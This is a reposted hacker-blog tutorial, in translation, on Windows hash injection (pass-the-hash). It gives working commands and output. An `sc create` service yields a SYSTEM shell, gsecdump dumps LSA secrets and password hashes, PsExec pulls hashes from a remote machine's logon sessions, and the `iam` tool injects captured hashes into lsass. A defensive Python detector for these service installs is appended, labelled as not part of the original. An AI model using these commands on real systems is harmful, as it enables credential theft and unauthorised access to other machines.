
Hash Injection Attack

Author: pt007[at]vip.sina.com

Source: Evil Octal Information Security Team (邪恶八进制信息安全团队, www.eviloctal.com)

Download URL:

http://www.truesec.com/PublicSto ... tectCookieSupport=1



To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------



Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD



Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.



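A tip: the iam tool from the pshtools toolkit can import the hash information just captured with gsecdump into the local lsass process, which is what makes this a hash injection attack. The foreign researchers really are impressive; administrators are going to be kept busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, do not actually need to be cracked at all; it is just a matter of using the tools. The original article puts it well: whether the password is set to 4 characters or 127 characters, once you have the hash, it is 100% done.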

Original article: http://truesecurity.se/blogs/mur ... -text-password.aspx

If you reprint this original article, please credit: reprinted from 心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]

Permalink: http://www.abcxd.com/abcxd/abcxdArticle/setou/205/
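For defenders, both steps in the transcript leave service-install traces: the sc create call registers an interactive service whose binary is cmd.exe, and PsExec installs its PSEXESVC helper service on the target. The Python sketch below is an added example, not part of the original post; the record layout (service_name, service_type, image_path) and the sample records are constructed, standing in for fields taken from service-install events or the Services registry key.

```python
import re

# Win32 service Type bits: `type= own` is 0x10, `type= interact` adds 0x100.
SERVICE_INTERACTIVE_PROCESS = 0x100

# A shell as the service binary is the pattern of `sc create ... cmd.exe /K start`.
INTERPRETER = re.compile(
    r"(?i)(?:^|[\\/\s\"])(?:cmd|powershell|pwsh)(?:\.exe)?(?=[\s\"]|$)")

# Constructed sample records (not real logs); the field names are assumptions.
SAMPLE_RECORDS = [
    {"service_name": "shellcmdline", "service_type": 0x110,
     "image_path": r"C:\WINDOWS\system32\cmd.exe /K start"},
    {"service_name": "PSEXESVC", "service_type": 0x10,
     "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"service_name": "W32Time", "service_type": 0x20,
     "image_path": r"C:\WINDOWS\system32\svchost.exe -k netsvcs"},
]


def review_service_install(rec):
    """Return the reasons a service-install record deserves triage."""
    reasons = []
    image = rec.get("image_path", "")
    if INTERPRETER.search(image):
        reasons.append("image path launches a command interpreter")
    if rec.get("service_type", 0) & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("service may interact with the desktop")
    # PSEXESVC is the helper service PsExec installs on the remote host.
    if (rec.get("service_name", "").upper() == "PSEXESVC"
            or "psexesvc.exe" in image.lower()):
        reasons.append("PsExec helper service installed")
    return reasons


def triage(records):
    """Map service name -> reasons, keeping only records that were flagged."""
    flagged = {}
    for rec in records:
        reasons = review_service_install(rec)
        if reasons:
            flagged[rec["service_name"]] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_RECORDS).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The interactive bit alone is only a triage signal, since some legitimate services set it; the combination with a shell as the service binary is the stronger indicator.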


Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved